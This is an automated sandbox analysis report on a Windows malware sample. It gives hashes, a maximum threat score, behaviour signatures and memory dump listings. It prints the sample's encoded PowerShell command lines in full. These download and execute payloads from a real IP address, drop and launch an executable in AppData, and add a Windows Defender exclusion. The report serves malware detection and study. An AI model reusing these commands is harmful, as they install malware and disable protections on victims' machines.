aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8

General

Target

aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe
Size

35KB
MD5

90481d2c6fbbe8d4ae6108d756a48d9d
SHA1

b08f7eafa5b562a09792bc2d4b11837eb82496bc
SHA256

aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8
SHA512

884fc809ed957b71467ca7b767a75685223ef6f518d9feba13037a79ec1bd5ee5de97a54afdc77f9c75ec7ecf8669629630d0a1f153805a28dd0c180e92c004f
SSDEEP

768:L2nQISr0yhamQEj06ggM/y4r/wOPpdwMNhghy0qN:L2nxpyhamQnI4kmTghy0w

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.194/go.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.194/me.png

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://62.204.41.194/F1.exe

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

5 1588 powershell.exe
6 848 powershell.exe
7 1792 powershell.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

848 powershell.exe
1792 powershell.exe
1568 powershell.exe
1588 powershell.exe

flow	pid	process
5	1588	powershell.exe
6	848	powershell.exe
7	1792	powershell.exe

pid	process
848	powershell.exe
1792	powershell.exe
1568	powershell.exe
1588	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	848	powershell.exe
Token: SeDebugPrivilege	1792	powershell.exe
Token: SeDebugPrivilege	1568	powershell.exe
Token: SeDebugPrivilege	1588	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe

description	pid	process	target process
PID 1240 wrote to memory of 848	1240	aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe	powershell.exe
PID 1240 wrote to memory of 848	1240	aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe	powershell.exe
PID 1240 wrote to memory of 848	1240	aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe	powershell.exe
PID 1240 wrote to memory of 1588	1240	aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe	powershell.exe
PID 1240 wrote to memory of 1588	1240	aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe	powershell.exe
PID 1240 wrote to memory of 1588	1240	aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe	powershell.exe
PID 1240 wrote to memory of 1792	1240	aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe	powershell.exe
PID 1240 wrote to memory of 1792	1240	aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe	powershell.exe
PID 1240 wrote to memory of 1792	1240	aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe	powershell.exe
PID 1240 wrote to memory of 1568	1240	aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe	powershell.exe
PID 1240 wrote to memory of 1568	1240	aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe	powershell.exe
PID 1240 wrote to memory of 1568	1240	aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe
"C:\Users\Admin\AppData\Local\Temp\aac1a251a0246a8271d3a6274fce25e29608bd15cb1c3382232384923b6700c8.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1240

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:848

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1568

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
5c5954b22330f6f8cdaa6bb29d3edb68

SHA1
c7c6e0219aa63e3effc4d3e405da1e988727504d

SHA256
fc3ca5fdb1617c994a37d8ee8d4510c3fb192acc80b562d02f6825330e7de70d

SHA512
f148e17c2fb94b71240b0d545c64d9bdaa691e9c8d0add97619abf14bdd90916862f90ce7038c4998bde69fe7d872f09d3197f0531ce356e56386c3742674e36

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
5c5954b22330f6f8cdaa6bb29d3edb68

SHA1
c7c6e0219aa63e3effc4d3e405da1e988727504d

SHA256
fc3ca5fdb1617c994a37d8ee8d4510c3fb192acc80b562d02f6825330e7de70d

SHA512
f148e17c2fb94b71240b0d545c64d9bdaa691e9c8d0add97619abf14bdd90916862f90ce7038c4998bde69fe7d872f09d3197f0531ce356e56386c3742674e36

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
5c5954b22330f6f8cdaa6bb29d3edb68

SHA1
c7c6e0219aa63e3effc4d3e405da1e988727504d

SHA256
fc3ca5fdb1617c994a37d8ee8d4510c3fb192acc80b562d02f6825330e7de70d

SHA512
f148e17c2fb94b71240b0d545c64d9bdaa691e9c8d0add97619abf14bdd90916862f90ce7038c4998bde69fe7d872f09d3197f0531ce356e56386c3742674e36

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WB4MOTSE77GGDZMX7L5D.temp
Filesize
7KB

MD5
5c5954b22330f6f8cdaa6bb29d3edb68

SHA1
c7c6e0219aa63e3effc4d3e405da1e988727504d

SHA256
fc3ca5fdb1617c994a37d8ee8d4510c3fb192acc80b562d02f6825330e7de70d

SHA512
f148e17c2fb94b71240b0d545c64d9bdaa691e9c8d0add97619abf14bdd90916862f90ce7038c4998bde69fe7d872f09d3197f0531ce356e56386c3742674e36

Download Submit
memory/848-80-0x0000000002590000-0x0000000002610000-memory.dmp

Filesize
512KB

Download
memory/848-94-0x0000000002590000-0x0000000002610000-memory.dmp

Filesize
512KB

Download
memory/848-76-0x0000000002590000-0x0000000002610000-memory.dmp

Filesize
512KB

Download
memory/848-89-0x0000000002590000-0x0000000002610000-memory.dmp

Filesize
512KB

Download
memory/848-83-0x0000000002590000-0x0000000002610000-memory.dmp

Filesize
512KB

Download
memory/1240-54-0x00000000012D0000-0x00000000012E0000-memory.dmp

Filesize
64KB

Download
memory/1568-82-0x0000000002860000-0x00000000028E0000-memory.dmp

Filesize
512KB

Download
memory/1568-81-0x0000000002860000-0x00000000028E0000-memory.dmp

Filesize
512KB

Download
memory/1568-84-0x0000000002860000-0x00000000028E0000-memory.dmp

Filesize
512KB

Download
memory/1588-79-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1588-88-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1588-92-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1588-93-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1588-86-0x0000000002580000-0x0000000002600000-memory.dmp

Filesize
512KB

Download
memory/1792-75-0x0000000002420000-0x0000000002428000-memory.dmp

Filesize
32KB

Download
memory/1792-87-0x0000000002210000-0x0000000002290000-memory.dmp

Filesize
512KB

Download
memory/1792-85-0x0000000002210000-0x0000000002290000-memory.dmp

Filesize
512KB

Download
memory/1792-90-0x0000000002210000-0x0000000002290000-memory.dmp

Filesize
512KB

Download
memory/1792-91-0x0000000002210000-0x0000000002290000-memory.dmp

Filesize
512KB

Download
memory/1792-78-0x0000000002210000-0x0000000002290000-memory.dmp

Filesize
512KB

Download
memory/1792-77-0x0000000002210000-0x0000000002290000-memory.dmp

Filesize
512KB

Download
memory/1792-74-0x000000001B2E0000-0x000000001B5C2000-memory.dmp

Filesize
2.9MB

Download
memory/1792-95-0x0000000002210000-0x0000000002290000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads